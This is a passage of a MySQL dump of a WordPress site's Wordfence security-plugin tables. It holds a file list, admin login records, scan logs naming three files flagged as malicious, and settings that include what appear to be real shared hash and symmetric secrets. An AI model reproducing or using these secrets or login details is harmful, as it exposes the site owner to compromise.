3492,'wp-includes/rest-api/search/class-wp-rest-post-search-handler.php'),(3493,'wp-includes/rest-api/search/class-wp-rest-search-handler.php'),(3494,'wp-includes/rest-api/search/class-wp-rest-term-search-handler.php'),(3495,'wp-includes/rest-api.php'),(3496,'wp-includes/revision.php'),(3497,'wp-includes/rewrite.php'),(3498,'wp-includes/robots-template.php'),(3499,'wp-includes/rss-functions.php'),(3500,'wp-includes/rss.php'),(3501,'wp-includes/script-loader.php'),(3502,'wp-includes/session.php'),(3503,'wp-includes/shortcodes.php'),(3504,'wp-includes/sitemaps/class-wp-sitemaps-index.php'),(3505,'wp-includes/sitemaps/class-wp-sitemaps-provider.php'),(3506,'wp-includes/sitemaps/class-wp-sitemaps-registry.php'),(3507,'wp-includes/sitemaps/class-wp-sitemaps-renderer.php'),(3508,'wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php'),(3509,'wp-includes/sitemaps/class-wp-sitemaps.php'),(3510,'wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php'),(3511,'wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php'),(3512,'wp-includes/sitemaps/providers/class-wp-sitemaps-users.php'),(3513,'wp-includes/sitemaps.php'),(3514,'wp-includes/sodium_compat/LICENSE'),(3515,'wp-includes/sodium_compat/autoload-php7.php'),(3516,'wp-includes/sodium_compat/autoload.php'),(3517,'wp-includes/sodium_compat/composer.json'),(3518,'wp-includes/sodium_compat/lib/constants.php'),(3519,'wp-includes/sodium_compat/lib/namespaced.php'),(3520,'wp-includes/sodium_compat/lib/php72compat.php'),(3521,'wp-includes/sodium_compat/lib/php72compat_const.php'),(3522,'wp-includes/sodium_compat/lib/ristretto255.php'),(3523,'wp-includes/sodium_compat/lib/sodium_compat.php'),(3524,'wp-includes/sodium_compat/lib/stream-xchacha20.php'),(3525,'wp-includes/sodium_compat/namespaced/Compat.php'),(3526,'wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php'),(3527,'wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php'),(3528,'wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php'),(3529,'wp-includes/sodium_compat/namespaced/Core/ChaCha20.php'),(3530,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php'),(3531,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php'),(3532,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php'),(3533,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php'),(3534,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php'),(3535,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php'),(3536,'wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php'),(3537,'wp-includes/sodium_compat/namespaced/Core/Curve25519.php'),(3538,'wp-includes/sodium_compat/namespaced/Core/Ed25519.php'),(3539,'wp-includes/sodium_compat/namespaced/Core/HChaCha20.php'),(3540,'wp-includes/sodium_compat/namespaced/Core/HSalsa20.php'),(3541,'wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php'),(3542,'wp-includes/sodium_compat/namespaced/Core/Poly1305.php'),(3543,'wp-includes/sodium_compat/namespaced/Core/Salsa20.php'),(3544,'wp-includes/sodium_compat/namespaced/Core/SipHash.php'),(3545,'wp-includes/sodium_compat/namespaced/Core/Util.php'),(3546,'wp-includes/sodium_compat/namespaced/Core/X25519.php'),(3547,'wp-includes/sodium_compat/namespaced/Core/XChaCha20.php'),(3548,'wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php'),(3549,'wp-includes/sodium_compat/namespaced/Crypto.php'),(3550,'wp-includes/sodium_compat/namespaced/File.php'),(3551,'wp-includes/sodium_compat/src/Compat.php'),(3552,'wp-includes/sodium_compat/src/Core/BLAKE2b.php'),(3553,'wp-includes/sodium_compat/src/Core/Base64/Common.php'),(3554,'wp-includes/sodium_compat/src/Core/Base64/Original.php'),(3555,'wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php'),(3556,'wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php'),(3557,'wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php'),(3558,'wp-includes/sodium_compat/src/Core/ChaCha20.php'),(3559,'wp-includes/sodium_compat/src/Core/Curve25519/Fe.php'),(3560,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php'),(3561,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php'),(3562,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php'),(3563,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php'),(3564,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php'),(3565,'wp-includes/sodium_compat/src/Core/Curve25519/H.php'),(3566,'wp-includes/sodium_compat/src/Core/Curve25519/README.md'),(3567,'wp-includes/sodium_compat/src/Core/Curve25519.php'),(3568,'wp-includes/sodium_compat/src/Core/Ed25519.php'),(3569,'wp-includes/sodium_compat/src/Core/HChaCha20.php'),(3570,'wp-includes/sodium_compat/src/Core/HSalsa20.php'),(3571,'wp-includes/sodium_compat/src/Core/Poly1305/State.php'),(3572,'wp-includes/sodium_compat/src/Core/Poly1305.php'),(3573,'wp-includes/sodium_compat/src/Core/Ristretto255.php'),(3574,'wp-includes/sodium_compat/src/Core/Salsa20.php'),(3575,'wp-includes/sodium_compat/src/Core/SecretStream/State.php'),(3576,'wp-includes/sodium_compat/src/Core/SipHash.php'),(3577,'wp-includes/sodium_compat/src/Core/Util.php'),(3578,'wp-includes/sodium_compat/src/Core/X25519.php'),(3579,'wp-includes/sodium_compat/src/Core/XChaCha20.php'),(3580,'wp-includes/sodium_compat/src/Core/XSalsa20.php'),(3581,'wp-includes/sodium_compat/src/Core32/BLAKE2b.php'),(3582,'wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php'),(3583,'wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php'),(3584,'wp-includes/sodium_compat/src/Core32/ChaCha20.php'),(3585,'wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php'),(3586,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php'),(3587,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php'),(3588,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php'),(3589,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php'),(3590,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php'),(3591,'wp-includes/sodium_compat/src/Core32/Curve25519/H.php'),(3592,'wp-includes/sodium_compat/src/Core32/Curve25519/README.md'),(3593,'wp-includes/sodium_compat/src/Core32/Curve25519.php'),(3594,'wp-includes/sodium_compat/src/Core32/Ed25519.php'),(3595,'wp-includes/sodium_compat/src/Core32/HChaCha20.php'),(3596,'wp-includes/sodium_compat/src/Core32/HSalsa20.php'),(3597,'wp-includes/sodium_compat/src/Core32/Int32.php'),(3598,'wp-includes/sodium_compat/src/Core32/Int64.php'),(3599,'wp-includes/sodium_compat/src/Core32/Poly1305/State.php'),(3600,'wp-includes/sodium_compat/src/Core32/Poly1305.php'),(3601,'wp-includes/sodium_compat/src/Core32/Salsa20.php'),(3602,'wp-includes/sodium_compat/src/Core32/SecretStream/State.php'),(3603,'wp-includes/sodium_compat/src/Core32/SipHash.php'),(3604,'wp-includes/sodium_compat/src/Core32/Util.php'),(3605,'wp-includes/sodium_compat/src/Core32/X25519.php'),(3606,'wp-includes/sodium_compat/src/Core32/XChaCha20.php'),(3607,'wp-includes/sodium_compat/src/Core32/XSalsa20.php'),(3608,'wp-includes/sodium_compat/src/Crypto.php'),(3609,'wp-includes/sodium_compat/src/Crypto32.php'),(3610,'wp-includes/sodium_compat/src/File.php'),(3611,'wp-includes/sodium_compat/src/PHP52/SplFixedArray.php'),(3612,'wp-includes/sodium_compat/src/SodiumException.php'),(3613,'wp-includes/spl-autoload-compat.php'),(3614,'wp-includes/taxonomy.php'),(3615,'wp-includes/template-canvas.php'),(3616,'wp-includes/template-loader.php'),(3617,'wp-includes/template.php'),(3618,'wp-includes/theme-compat/comments.php'),(3619,'wp-includes/theme-compat/embed-404.php'),(3620,'wp-includes/theme-compat/embed-content.php'),(3621,'wp-includes/theme-compat/embed.php'),(3622,'wp-includes/theme-compat/footer-embed.php'),(3623,'wp-includes/theme-compat/footer.php'),(3624,'wp-includes/theme-compat/header-embed.php'),(3625,'wp-includes/theme-compat/header.php'),(3626,'wp-includes/theme-compat/sidebar.php'),(3627,'wp-includes/theme-i18n.json'),(3628,'wp-includes/theme-templates.php'),(3629,'wp-includes/theme.json'),(3630,'wp-includes/theme.php'),(3631,'wp-includes/update.php'),(3632,'wp-includes/user.php'),(3633,'wp-includes/vars.php'),(3634,'wp-includes/version.php'),(3635,'wp-includes/widgets/class-wp-nav-menu-widget.php'),(3636,'wp-includes/widgets/class-wp-widget-archives.php'),(3637,'wp-includes/widgets/class-wp-widget-block.php'),(3638,'wp-includes/widgets/class-wp-widget-calendar.php'),(3639,'wp-includes/widgets/class-wp-widget-categories.php'),(3640,'wp-includes/widgets/class-wp-widget-custom-html.php'),(3641,'wp-includes/widgets/class-wp-widget-links.php'),(3642,'wp-includes/widgets/class-wp-widget-media-audio.php'),(3643,'wp-includes/widgets/class-wp-widget-media-gallery.php'),(3644,'wp-includes/widgets/class-wp-widget-media-image.php'),(3645,'wp-includes/widgets/class-wp-widget-media-video.php'),(3646,'wp-includes/widgets/class-wp-widget-media.php'),(3647,'wp-includes/widgets/class-wp-widget-meta.php'),(3648,'wp-includes/widgets/class-wp-widget-pages.php'),(3649,'wp-includes/widgets/class-wp-widget-recent-comments.php'),(3650,'wp-includes/widgets/class-wp-widget-recent-posts.php'),(3651,'wp-includes/widgets/class-wp-widget-rss.php'),(3652,'wp-includes/widgets/class-wp-widget-search.php'),(3653,'wp-includes/widgets/class-wp-widget-tag-cloud.php'),(3654,'wp-includes/widgets/class-wp-widget-text.php'),(3655,'wp-includes/widgets.php'),(3656,'wp-includes/wlwmanifest.xml'),(3657,'wp-includes/wp-db.php'),(3658,'wp-includes/wp-diff.php'),(3659,'wp-links-opml.php'),(3660,'wp-load.php'),(3661,'wp-login.php'),(3662,'wp-mail.php'),(3663,'wp-settings.php'),(3664,'wp-signup.php'),(3665,'wp-trackback.php'),(3666,'xmlrpc.php');
/*!40000 ALTER TABLE `wp_wfknownfilelist` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wflivetraffichuman`
--

DROP TABLE IF EXISTS `wp_wflivetraffichuman`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wflivetraffichuman` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `identifier` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `expiration` int(10) unsigned NOT NULL,
  PRIMARY KEY (`IP`,`identifier`),
  KEY `expiration` (`expiration`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wflivetraffichuman`
--

LOCK TABLES `wp_wflivetraffichuman` WRITE;
/*!40000 ALTER TABLE `wp_wflivetraffichuman` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wflivetraffichuman` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wflocs`
--

DROP TABLE IF EXISTS `wp_wflocs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wflocs` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `ctime` int(10) unsigned NOT NULL,
  `failed` tinyint(3) unsigned NOT NULL,
  `city` varchar(255) DEFAULT '',
  `region` varchar(255) DEFAULT '',
  `countryName` varchar(255) DEFAULT '',
  `countryCode` char(2) DEFAULT '',
  `lat` float(10,7) DEFAULT 0.0000000,
  `lon` float(10,7) DEFAULT 0.0000000,
  PRIMARY KEY (`IP`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wflocs`
--

LOCK TABLES `wp_wflocs` WRITE;
/*!40000 ALTER TABLE `wp_wflocs` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wflocs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wflogins`
--

DROP TABLE IF EXISTS `wp_wflogins`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wflogins` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `hitID` int(11) DEFAULT NULL,
  `ctime` double(17,6) unsigned NOT NULL,
  `fail` tinyint(3) unsigned NOT NULL,
  `action` varchar(40) NOT NULL,
  `username` varchar(255) NOT NULL,
  `userID` int(10) unsigned NOT NULL,
  `IP` binary(16) DEFAULT NULL,
  `UA` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`IP`,`fail`),
  KEY `hitID` (`hitID`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wflogins`
--

LOCK TABLES `wp_wflogins` WRITE;
/*!40000 ALTER TABLE `wp_wflogins` DISABLE KEYS */;
INSERT INTO `wp_wflogins` VALUES (1,191,1628241084.006478,0,'loginOK','admin',1,'\0\0\0\0\0\0\0\0\0\0����qH','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36'),(2,203,1629381709.296596,0,'loginOK','admin',1,'\0\0\0\0\0\0\0\0\0\0����qH','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36'),(3,204,1629755631.274583,0,'loginOK','admin',1,'\0\0\0\0\0\0\0\0\0\0��gF�B','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0');
/*!40000 ALTER TABLE `wp_wflogins` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfls_2fa_secrets`
--

DROP TABLE IF EXISTS `wp_wfls_2fa_secrets`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfls_2fa_secrets` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL,
  `secret` tinyblob NOT NULL,
  `recovery` blob NOT NULL,
  `ctime` int(10) unsigned NOT NULL,
  `vtime` int(10) unsigned NOT NULL,
  `mode` enum('authenticator') NOT NULL DEFAULT 'authenticator',
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfls_2fa_secrets`
--

LOCK TABLES `wp_wfls_2fa_secrets` WRITE;
/*!40000 ALTER TABLE `wp_wfls_2fa_secrets` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfls_2fa_secrets` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfls_settings`
--

DROP TABLE IF EXISTS `wp_wfls_settings`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfls_settings` (
  `name` varchar(191) NOT NULL DEFAULT '',
  `value` longblob DEFAULT NULL,
  `autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfls_settings`
--

LOCK TABLES `wp_wfls_settings` WRITE;
/*!40000 ALTER TABLE `wp_wfls_settings` DISABLE KEYS */;
INSERT INTO `wp_wfls_settings` VALUES ('2fa-user-grace-period','10','yes'),('allow-disabling-ntp','1','yes'),('allow-xml-rpc','1','yes'),('captcha-stats','{\"counts\":[0,0,0,0,0,0,0,0,0,0,0],\"avg\":0}','yes'),('delete-deactivation','','yes'),('enable-auth-captcha','','yes'),('enable-woocommerce-integration','','yes'),('global-notices','[]','yes'),('ip-source','','yes'),('ip-trusted-proxies','','yes'),('last-secret-refresh','1624361039','yes'),('recaptcha-threshold','0.5','yes'),('remember-device','','yes'),('remember-device-duration','2592000','yes'),('require-2fa-grace-period-enabled','','yes'),('require-2fa.administrator','','yes'),('shared-hash-secret','7761bc496c40f560cf29a6287327c2783af7efae1a752b27c2babda4b1200ef5','yes'),('shared-symmetric-secret','df362ed5041b93a9c2980a25f7214da48f0a2697faee0a523a8d7769c07ce27c','yes'),('whitelisted','','yes'),('xmlrpc-enabled','1','yes');
/*!40000 ALTER TABLE `wp_wfls_settings` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfnotifications`
--

DROP TABLE IF EXISTS `wp_wfnotifications`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfnotifications` (
  `id` varchar(32) NOT NULL DEFAULT '',
  `new` tinyint(3) unsigned NOT NULL DEFAULT 1,
  `category` varchar(255) NOT NULL,
  `priority` int(11) NOT NULL DEFAULT 1000,
  `ctime` int(10) unsigned NOT NULL,
  `html` text NOT NULL,
  `links` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfnotifications`
--

LOCK TABLES `wp_wfnotifications` WRITE;
/*!40000 ALTER TABLE `wp_wfnotifications` DISABLE KEYS */;
INSERT INTO `wp_wfnotifications` VALUES ('site-AEAAAAA',0,'wfplugin_updates',502,1629381798,'<a href=\"https://www.westonspirit.org.uk/wp-admin/update-core.php\">An update is available for WordPress (v5.8)</a>','[]'),('site-AYAAAAA',1,'wfplugin_scan',502,1629727416,'<a href=\"https://www.westonspirit.org.uk/wp-admin/admin.php?page=WordfenceScan\">11 issues found in most recent scan</a>','[]');
/*!40000 ALTER TABLE `wp_wfnotifications` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfpendingissues`
--

DROP TABLE IF EXISTS `wp_wfpendingissues`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfpendingissues` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `time` int(10) unsigned NOT NULL,
  `lastUpdated` int(10) unsigned NOT NULL,
  `status` varchar(10) NOT NULL,
  `type` varchar(20) NOT NULL,
  `severity` tinyint(3) unsigned NOT NULL,
  `ignoreP` char(32) NOT NULL,
  `ignoreC` char(32) NOT NULL,
  `shortMsg` varchar(255) NOT NULL,
  `longMsg` text DEFAULT NULL,
  `data` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `lastUpdated` (`lastUpdated`),
  KEY `status` (`status`),
  KEY `ignoreP` (`ignoreP`),
  KEY `ignoreC` (`ignoreC`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfpendingissues`
--

LOCK TABLES `wp_wfpendingissues` WRITE;
/*!40000 ALTER TABLE `wp_wfpendingissues` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfpendingissues` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfreversecache`
--

DROP TABLE IF EXISTS `wp_wfreversecache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfreversecache` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `host` varchar(255) NOT NULL,
  `lastUpdate` int(10) unsigned NOT NULL,
  PRIMARY KEY (`IP`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfreversecache`
--

LOCK TABLES `wp_wfreversecache` WRITE;
/*!40000 ALTER TABLE `wp_wfreversecache` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfreversecache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfsnipcache`
--

DROP TABLE IF EXISTS `wp_wfsnipcache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfsnipcache` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `IP` varchar(45) NOT NULL DEFAULT '',
  `expiration` timestamp NOT NULL DEFAULT current_timestamp(),
  `body` varchar(255) NOT NULL DEFAULT '',
  `count` int(10) unsigned NOT NULL DEFAULT 0,
  `type` int(10) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`),
  KEY `expiration` (`expiration`),
  KEY `IP` (`IP`),
  KEY `type` (`type`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfsnipcache`
--

LOCK TABLES `wp_wfsnipcache` WRITE;
/*!40000 ALTER TABLE `wp_wfsnipcache` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfsnipcache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfstatus`
--

DROP TABLE IF EXISTS `wp_wfstatus`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfstatus` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `ctime` double(17,6) unsigned NOT NULL,
  `level` tinyint(3) unsigned NOT NULL,
  `type` char(5) NOT NULL,
  `msg` varchar(1000) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`ctime`),
  KEY `k2` (`type`)
) ENGINE=InnoDB AUTO_INCREMENT=2635 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfstatus`
--

LOCK TABLES `wp_wfstatus` WRITE;
/*!40000 ALTER TABLE `wp_wfstatus` DISABLE KEYS */;
INSERT INTO `wp_wfstatus` VALUES (1090,1626647473.314413,2,'info','Analyzed 1700 files containing 24.37 MB of data so far'),(1091,1626647476.980815,2,'info','Analyzed 1800 files containing 29.25 MB of data so far'),(1092,1626647480.732717,2,'info','Analyzed 1900 files containing 30.04 MB of data so far'),(1093,1626647482.672339,2,'info','Analyzed 2000 files containing 30.84 MB of data so far'),(1094,1626647485.427336,2,'info','Analyzed 2100 files containing 32.85 MB of data so far'),(1095,1626647488.751936,2,'info','Analyzed 2200 files containing 35.34 MB of data so far'),(1096,1626647492.152015,2,'info','Analyzed 2300 files containing 36.5 MB of data so far'),(1097,1626647495.313029,2,'info','Analyzed 2400 files containing 46.01 MB of data so far'),(1098,1626647498.490928,2,'info','Analyzed 2500 files containing 51.45 MB of data so far'),(1099,1626647502.466318,2,'info','Analyzed 2600 files containing 52.84 MB of data so far'),(1100,1626647506.112720,2,'info','Analyzed 2700 files containing 55.15 MB of data so far'),(1101,1626647509.757405,2,'info','Analyzed 2800 files containing 59.33 MB of data so far'),(1102,1626647512.549859,2,'info','Analyzed 2900 files containing 60.72 MB of data so far'),(1103,1626647515.245897,2,'info','Analyzed 3000 files containing 62.4 MB of data so far'),(1104,1626647515.719197,2,'info','Analyzed 3015 files containing 62.7 MB of data.'),(1112,1626647517.483330,2,'info','Starting scan of file contents'),(1113,1626647518.516644,2,'info','Scanned contents of 33 additional files at 32.62 per second'),(1114,1626647519.575050,2,'info','Scanned contents of 75 additional files at 36.23 per second'),(1115,1626647520.362532,2,'info','Scanned contents of 86 additional files at 30.10 per second'),(1116,1626647520.368705,2,'info','Asking Wordfence to check URLs against malware list.'),(1117,1626647520.377638,2,'info','Checking 198 host keys against Wordfence scanning servers.'),(1118,1626647521.009999,2,'info','Done host key check.'),(1119,1626647521.781416,2,'info','Done file contents scan'),(1120,1626647521.792210,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/css/index.php'),(1121,1626647521.813510,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/maint/hnsqbue.php'),(1122,1626647521.834596,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/includes/fm.php'),(1128,1626647525.790674,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(1129,1626647525.802300,2,'info','Checking 1507 host keys against Wordfence scanning servers.'),(1130,1626647526.605777,2,'info','Done host key check.'),(1131,1626647526.625180,2,'info','Done examining URLs'),(1136,1626647527.221358,2,'info','Starting password strength check on 1 user.'),(1143,1626647530.478655,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(1144,1626647530.488915,2,'info','Done examining URLs'),(1146,1626647530.745543,1,'info','-------------------'),(1147,1626647530.747580,2,'info','Wordfence used 10 MB of memory for scan. Server peak memory usage was: 34 MB'),(1148,1626647530.749487,1,'info','Scan Complete. Scanned 3015 files, 5 plugins, 1 themes, 250 posts, 0 comments and 1766 URLs in 1 minute 43 seconds.'),(1151,1626694024.947018,1,'info','Initiating quick scan'),(1156,1626694025.165973,1,'info','-------------------'),(1157,1626694025.187898,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 16 MB'),(1158,1626694025.198022,1,'info','Quick Scan Complete. Scanned in 1 second.'),(1161,1626780405.311256,1,'info','Initiating quick scan'),(1166,1626780405.518345,1,'info','-------------------'),(1167,1626780405.544031,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 24 MB'),(1168,1626780405.548121,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(1171,1626867070.746759,1,'info','Initiating quick scan'),(1176,1626867071.022032,1,'info','-------------------'),(1177,1626867071.052783,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 24 MB'),(1178,1626867071.067571,1,'info','Quick Scan Complete. Scanned in 1 second.'),(1180,1626907299.616890,1,'info','Scheduled Wordfence scan starting at Wednesday 21st of July 2021 10:41:39 PM'),(1182,1626907300.130500,1,'info','Contacting Wordfence to initiate scan'),(1189,1626907307.779713,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(1190,1626907307.781776,2,'info','The disk has 3465462.45 MB available'),(1198,1626907308.063375,2,'info','Getting plugin list from WordPress'),(1199,1626907308.088384,2,'info','Found 4 plugins'),(1200,1626907308.105344,2,'info','Getting theme list from WordPress'),(1201,1626907308.163749,2,'info','Found 1 theme'),(1213,1626907311.544901,2,'info','500 files indexed'),(1214,1626907311.686168,2,'info','1000 files indexed'),(1215,1626907311.849398,2,'info','1500 files indexed'),(1216,1626907311.974530,2,'info','2000 files indexed'),(1217,1626907312.042924,2,'info','2500 files indexed'),(1218,1626907312.090062,2,'info','3000 files indexed'),(1219,1626907312.112471,2,'info','3015 files indexed'),(1220,1626907314.140888,2,'info','Analyzed 100 files containing 1.67 MB of data so far'),(1221,1626907317.866512,2,'info','Analyzed 200 files containing 3.22 MB of data so far'),(1222,1626907319.526518,2,'info','Analyzed 300 files containing 4.52 MB of data so far'),(1223,1626907320.923329,2,'info','Analyzed 400 files containing 7.28 MB of data so far'),(1224,1626907322.615120,2,'info','Analyzed 500 files containing 8.16 MB of data so far'),(1225,1626907324.573028,2,'info','Analyzed 600 files containing 9.35 MB of data so far'),(1226,1626907326.150733,2,'info','Analyzed 700 files containing 10.07 MB of data so far'),(1227,1626907329.084660,2,'info','Analyzed 800 files containing 11.2 MB of data so far'),(1228,1626907330.911459,2,'info','Analyzed 900 files containing 12.9 MB of data so far'),(1229,1626907332.239143,2,'info','Analyzed 1000 files containing 17.92 MB of data so far'),(1230,1626907334.516391,2,'info','Analyzed 1100 files containing 20.33 MB of data so far'),(1231,1626907336.760620,2,'info','Analyzed 1200 files containing 21.08 MB of data so far'),(1232,1626907338.612523,2,'info','Analyzed 1300 files containing 22.41 MB of data so far'),(1233,1626907341.888051,2,'info','Analyzed 1400 files containing 23.28 MB of data so far'),(1234,1626907343.591025,2,'info','Analyzed 1500 files containing 23.51 MB of data so far'),(1235,1626907345.518454,2,'info','Analyzed 1600 files containing 23.54 MB of data so far'),(1236,1626907347.501968,2,'info','Analyzed 1700 files containing 24.37 MB of data so far'),(1237,1626907350.998563,2,'info','Analyzed 1800 files containing 29.25 MB of data so far'),(1238,1626907353.705126,2,'info','Analyzed 1900 files containing 30.05 MB of data so far'),(1239,1626907355.730956,2,'info','Analyzed 2000 files containing 30.85 MB of data so far'),(1240,1626907357.485066,2,'info','Analyzed 2100 files containing 32.86 MB of data so far'),(1241,1626907359.641402,2,'info','Analyzed 2200 files containing 35.34 MB of data so far'),(1242,1626907361.126075,2,'info','Analyzed 2300 files containing 36.5 MB of data so far'),(1243,1626907363.547786,2,'info','Analyzed 2400 files containing 46.02 MB of data so 